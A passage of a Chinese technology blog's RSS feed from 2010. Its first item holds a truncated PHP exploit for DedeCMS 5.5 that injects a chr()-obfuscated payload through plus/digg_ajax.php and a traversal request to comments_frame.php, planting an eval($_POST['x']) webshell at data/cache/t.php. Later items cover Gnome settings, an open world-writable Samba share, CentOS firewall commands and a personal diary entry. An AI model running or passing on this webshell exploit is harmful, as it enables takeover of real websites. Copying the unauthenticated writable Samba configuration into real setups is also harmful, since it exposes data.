    &lt;span style=&quot;color: #b1b100;&quot;&gt;return&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$back&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/analysis-dedecms-5-5-datalistcp-class-php-contains/&quot; title=&quot;分析DEDECMS 5.5 datalistcp.class.php 包含&quot;&gt;分析DEDECMS 5.5 datalistcp.class.php 包含&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-fiction-serial-module-0day/&quot; title=&quot;DEDECMS 小说连载模块 0DAY&quot;&gt;DEDECMS 小说连载模块 0DAY&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-xday/&quot; title=&quot;DEDECMS XDAY&quot;&gt;DEDECMS XDAY&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-v5-5-final-select_soft_post-php-vulnerability/&quot; title=&quot;DEDECMS v5.5 Final select_soft_post.php 漏洞&quot;&gt;DEDECMS v5.5 Final select_soft_post.php 漏洞&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/eye-day-film-system-0day/&quot; title=&quot;睛天电影系统 0DAY&quot;&gt;睛天电影系统 0DAY&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/wordpress-2-8-all-version-xss-0day/&quot; title=&quot;Wordpress 2.8 All Version Xss 0DAY&quot;&gt;Wordpress 2.8 All Version Xss 0DAY&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/wind-4-0-sp7-getshell-0day-inquiry/&quot; title=&quot;风讯 4.0 SP7 getshell 0day&quot;&gt;风讯 4.0 SP7 getshell 0day&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-53-inadequacies-chicken-plus-one-small-leak/&quot; title=&quot;dedecms 5.3的不足之处,加一鸡肋小漏!&quot;&gt;dedecms 5.3的不足之处,加一鸡肋小漏!&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/wodig413access-free-version-utf-8-from-the-loopholes/&quot; title=&quot;Wodig4.1.3Access免费版(UTF-8)上传漏洞&quot;&gt;Wodig4.1.3Access免费版(UTF-8)上传漏洞&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/0day-windows-7-rc-7100-gdi-driver-dos-kernel-vulnerability-win32ksys/&quot; title=&quot;[0Day]WINDOWS 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞&quot;&gt;[0Day]WINDOWS 7 RC 7100 GDI驱动Win32k.sys内核D.O.S漏洞&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186608/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/dedecms-5-5-datalistcp-class-php-contains-exp/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186608/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186608/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/dedecms-5-5-datalistcp-class-php-contains-exp/feed/</wfw:commentRss><slash:comments>2</slash:comments><description>来源于互联网，具体作者不详。看到好久了，一直是想写分析在发出来。老望。。。最近RSS订阅中好多这个，先发一下记录。有空分析，官方已修补。。
执行成功会在data/cache下生成t.php一句话小马
密码x

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
&amp;#60;?php
print_r&amp;#40;'
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
'&amp;#41;;
if &amp;#40;$argc &amp;#60; 3&amp;#41; &amp;#123;
print_r&amp;#40;'
+----------------------------------------+
Usage: php '.$argv&amp;#91;0&amp;#93;.' host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php '.$argv&amp;#91;0&amp;#93;.' localhost /dedecms/
+----------------------------------------+   
'&amp;#41;;
exit;
&amp;#125;
error_reporting&amp;#40;7&amp;#41;;
ini_set&amp;#40;'max_execution_time', 0&amp;#41;;
&amp;#160;
$host = $argv&amp;#91;1&amp;#93;;
$path = $argv&amp;#91;2&amp;#93;;
&amp;#160;
$post_a = 'plus/digg_ajax.php?id=1024e1024&amp;#38;*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
$post_b = 'needCode=aa/../../../data/mysql_error_trace';
$shell = 'data/cache/t.php';
&amp;#160;
get_send&amp;#40;$post_a&amp;#41;;
post_send&amp;#40;'plus/comments_frame.php',$post_b&amp;#41;;
$content = post_send&amp;#40;$shell,'t=echo tojen;'&amp;#41;;
&amp;#160;
if&amp;#40;substr&amp;#40;$content,9,3&amp;#41;=='200'&amp;#41;&amp;#123;
    echo &amp;#34;\nShell Address [...]&lt;img src=&quot;http://www1.feedsky.com/t1/405186608/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/dedecms-5-5-datalistcp-class-php-contains-exp/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186608/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186608/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>0day</category><category>DEDECMS 5.5</category><category>dedecms</category><category>入侵</category><category>Exp</category><category>datalistcp.class.php</category><category>PHP包含</category><pubDate>Sat, 03 Apr 2010 23:35:45 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/dedecms-5-5-datalistcp-class-php-contains-exp/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/?p=1367</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/dedecms-5-5-datalistcp-class-php-contains-exp/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186608/5236324</fs:itemid></item><item><title>如何在Gnome桌面不显示挂载的硬盘图标</title><link>http://www.lixiaopeng.org/gnome-desktop-does-not-show-how-to-mount-the-hard-disk-icon/</link><content:encoded>&lt;p&gt;要禁止这些图标在桌面上的显示，请按如下方法操作：&lt;/p&gt;
&lt;p&gt;1. 应用程序-&gt;系统工具-&gt;配置编辑器(gconf-editor),如果应用程序没有，可以试试直接终端运行sudo gconf-editor&lt;/p&gt;
&lt;p&gt;2. 找到 /apps/nautilus/desktop/volumes_visible 设置为 FALSE (单击即可)&lt;/p&gt;
&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;No Related Post&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186609/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/gnome-desktop-does-not-show-how-to-mount-the-hard-disk-icon/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186609/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186609/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/gnome-desktop-does-not-show-how-to-mount-the-hard-disk-icon/feed/</wfw:commentRss><slash:comments>174</slash:comments><description>要禁止这些图标在桌面上的显示，请按如下方法操作：
1. 应用程序-&gt;系统工具-&gt;配置编辑器(gconf-editor),如果应用程序没有，可以试试直接终端运行sudo gconf-editor
2. 找到 /apps/nautilus/desktop/volumes_visible 设置为 FALSE (单击即可)
您可能对以下文章有兴趣↓No Related Post&lt;img src=&quot;http://www1.feedsky.com/t1/405186609/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/gnome-desktop-does-not-show-how-to-mount-the-hard-disk-icon/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186609/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186609/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Linux</category><category>硬盘图标</category><category>Gnome</category><category>挂载</category><pubDate>Wed, 17 Mar 2010 00:12:29 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/gnome-desktop-does-not-show-how-to-mount-the-hard-disk-icon/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/?p=1364</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/gnome-desktop-does-not-show-how-to-mount-the-hard-disk-icon/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186609/5236324</fs:itemid></item><item><title>Ubuntu下Samba服务器</title><link>http://www.lixiaopeng.org/samba-server-under-ubuntu/</link><content:encoded>&lt;p&gt;Samba软件包的安装&lt;br /&gt;
在Ubuntu的终端中输入一下命令：&lt;br /&gt;
sudo apt-get install samba&lt;br /&gt;
sudo apt-get install smbclient&lt;/p&gt;
&lt;p&gt;Samba服务器的常用命令&lt;br /&gt;
开启Samba服务&lt;br /&gt;
sudo /etc/init.d/samba start&lt;br /&gt;
关闭Samba服务&lt;br /&gt;
sudo /etc/init.d/samba stop&lt;br /&gt;
重启Samba服务&lt;br /&gt;
sudo /etc/init.d/samba restart&lt;/p&gt;
&lt;p&gt;嘿嘿，由于st0p只是架设起来方便虚拟机访问我的物理硬盘的数据。所以只是简单的添加了任何人都可以访问并可写的共享。&lt;/p&gt;
&lt;p&gt;sudo gedit /etc/samba/smb.conf&lt;/p&gt;
&lt;p&gt;修改&lt;br /&gt;
# security = user&lt;br /&gt;
为&lt;br /&gt;
security = share&lt;/p&gt;
&lt;p&gt;以下内容加入未尾&lt;/p&gt;
&lt;p&gt;[D]&lt;br /&gt;
path=/media/sda5&lt;br /&gt;
public=yes&lt;br /&gt;
writable=yes&lt;/p&gt;
&lt;p&gt;[E]&lt;br /&gt;
path=/media/sda6&lt;br /&gt;
public=yes&lt;br /&gt;
writable=yes&lt;/p&gt;
&lt;p&gt;[F]&lt;br /&gt;
path=/media/sda7&lt;br /&gt;
public=yes&lt;br /&gt;
writable=yes&lt;/p&gt;
&lt;p&gt;[G]&lt;br /&gt;
path=/media/sda8&lt;br /&gt;
public=yes&lt;br /&gt;
writable=yes&lt;/p&gt;
&lt;p&gt;［D］为共享名字&lt;br /&gt;
path后面的是共享路径&lt;/p&gt;
&lt;p&gt;保存一下，然后我们输入sudo /etc/init.d/samba restart&lt;br /&gt;
然后我们在虚拟机中就可以通过\\IP访问了&lt;/p&gt;
&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/ubuntu-auto-mount-ntfs-partition/&quot; title=&quot;ubuntu自动挂载NTFS分区&quot;&gt;ubuntu自动挂载NTFS分区&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/ubuntu-commonly-used-software-configuration-and-order/&quot; title=&quot;Ubuntu常用软件,配置和命令&quot;&gt;Ubuntu常用软件,配置和命令&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186610/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/samba-server-under-ubuntu/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186610/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186610/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/samba-server-under-ubuntu/feed/</wfw:commentRss><slash:comments>21</slash:comments><description>Samba软件包的安装
在Ubuntu的终端中输入一下命令：
sudo apt-get install samba
sudo apt-get install smbclient
Samba服务器的常用命令
开启Samba服务
sudo /etc/init.d/samba start
关闭Samba服务
sudo /etc/init.d/samba stop
重启Samba服务
sudo /etc/init.d/samba restart
嘿嘿，由于st0p只是架设起来方便虚拟机访问我的物理硬盘的数据。所以只是简单的添加了任何人都可以访问并可写的共享。
sudo gedit /etc/samba/smb.conf
修改
# security = user
为
security = share
以下内容加入未尾
[D]
path=/media/sda5
public=yes
writable=yes
[E]
path=/media/sda6
public=yes
writable=yes
[F]
path=/media/sda7
public=yes
writable=yes
[G]
path=/media/sda8
public=yes
writable=yes
［D］为共享名字
path后面的是共享路径
保存一下，然后我们输入sudo /etc/init.d/samba restart
然后我们在虚拟机中就可以通过\\IP访问了
您可能对以下文章有兴趣↓ubuntu自动挂载NTFS分区Ubuntu常用软件,配置和命令&lt;img src=&quot;http://www1.feedsky.com/t1/405186610/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/samba-server-under-ubuntu/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186610/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186610/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Ubuntu</category><category>Linux</category><category>Samba</category><category>共享</category><pubDate>Wed, 17 Mar 2010 00:11:44 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/samba-server-under-ubuntu/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/samba-server-under-ubuntu/</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/samba-server-under-ubuntu/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186610/5236324</fs:itemid></item><item><title>CentOS 防火墙配置 80端口</title><link>http://www.lixiaopeng.org/centos-firewall-configuration-80-port/</link><content:encoded>&lt;p&gt;在虚拟机的CENTOS装好APACHE不能用,郁闷,解决方法如下&lt;/p&gt;
&lt;p&gt;/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT&lt;br /&gt;
/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT&lt;/p&gt;
&lt;p&gt;然后保存：&lt;br /&gt;
/etc/rc.d/init.d/iptables save&lt;/p&gt;
&lt;p&gt;这样重启计算机后,防火墙默认已经开放了80和22端口&lt;/p&gt;
&lt;p&gt;这里应该也可以不重启计算机：&lt;br /&gt;
/etc/init.d/iptables restart&lt;/p&gt;
&lt;p&gt;防火墙的关闭，关闭其服务即可：&lt;/p&gt;
&lt;p&gt;查看防火墙信息：&lt;br /&gt;
/etc/init.d/iptables status&lt;/p&gt;
&lt;p&gt;关闭防火墙服务：&lt;br /&gt;
/etc/init.d/iptables stop&lt;/p&gt;
&lt;p&gt;永久关闭？不知道怎么个永久法：&lt;br /&gt;
chkconfig –level 35 iptables off &lt;/p&gt;
&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;No Related Post&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186611/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/centos-firewall-configuration-80-port/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186611/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186611/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/centos-firewall-configuration-80-port/feed/</wfw:commentRss><slash:comments>26</slash:comments><description>在虚拟机的CENTOS装好APACHE不能用,郁闷,解决方法如下
/sbin/iptables -I INPUT -p tcp --dport 80 -j ACCEPT
/sbin/iptables -I INPUT -p tcp --dport 22 -j ACCEPT
然后保存：
/etc/rc.d/init.d/iptables save
这样重启计算机后,防火墙默认已经开放了80和22端口
这里应该也可以不重启计算机：
/etc/init.d/iptables restart
防火墙的关闭，关闭其服务即可：
查看防火墙信息：
/etc/init.d/iptables status
关闭防火墙服务：
/etc/init.d/iptables stop
永久关闭？不知道怎么个永久法：
chkconfig –level 35 iptables off 
您可能对以下文章有兴趣↓No Related Post&lt;img src=&quot;http://www1.feedsky.com/t1/405186611/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/centos-firewall-configuration-80-port/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186611/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186611/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>Linux</category><category>80端口</category><category>防火墙</category><category>CentOS</category><pubDate>Wed, 17 Mar 2010 00:10:35 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/centos-firewall-configuration-80-port/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/?p=1361</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/centos-firewall-configuration-80-port/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186611/5236324</fs:itemid></item><item><title>运气很不好</title><link>http://www.lixiaopeng.org/very-bad-luck/</link><content:encoded>&lt;p&gt;唉,最近右眼又开始跳了,每次这个时候一定没什么好事发生吧...&lt;/p&gt;
&lt;p&gt;前两天家里租出去的老房子外面的两个电表被别人砸坏了,打了110,好似没啥效果...小失望一下...&lt;/p&gt;
&lt;p&gt;手上碰了碰了两三处小伤口,因为一些事和老婆吵了一架,还有N多郁闷的事情..&lt;/p&gt;
&lt;p&gt;今天我亲爱的老奶奶也去世了,希望她能够安息,在天国过的一切都好!&lt;/p&gt;
&lt;p&gt;本来是打了很多字的,后来想想还是删掉吧,写的太乱了....&lt;/p&gt;
&lt;p&gt;人这一辈子活着,生不带来,死不带去.开心也是过,伤心也是过,我是不是活的太累了,是不是该改变一下了?&lt;/p&gt;
&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;No Related Post&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186612/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/very-bad-luck/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186612/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186612/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/very-bad-luck/feed/</wfw:commentRss><slash:comments>6</slash:comments><description>唉,最近右眼又开始跳了,每次这个时候一定没什么好事发生吧...
前两天家里租出去的老房子外面的两个电表被别人砸坏了,打了110,好似没啥效果...小失望一下...
手上碰了碰了两三处小伤口,因为一些事和老婆吵了一架,还有N多郁闷的事情..
今天我亲爱的老奶奶也去世了,希望她能够安息,在天国过的一切都好!
本来是打了很多字的,后来想想还是删掉吧,写的太乱了....
人这一辈子活着,生不带来,死不带去.开心也是过,伤心也是过,我是不是活的太累了,是不是该改变一下了?
您可能对以下文章有兴趣↓No Related Post&lt;img src=&quot;http://www1.feedsky.com/t1/405186612/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/very-bad-luck/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186612/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186612/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>运气</category><category>随笔</category><pubDate>Fri, 12 Mar 2010 22:50:04 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/very-bad-luck/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/very-bad-luck/</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/very-bad-luck/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186612/5236324</fs:itemid></item></channel></rss>
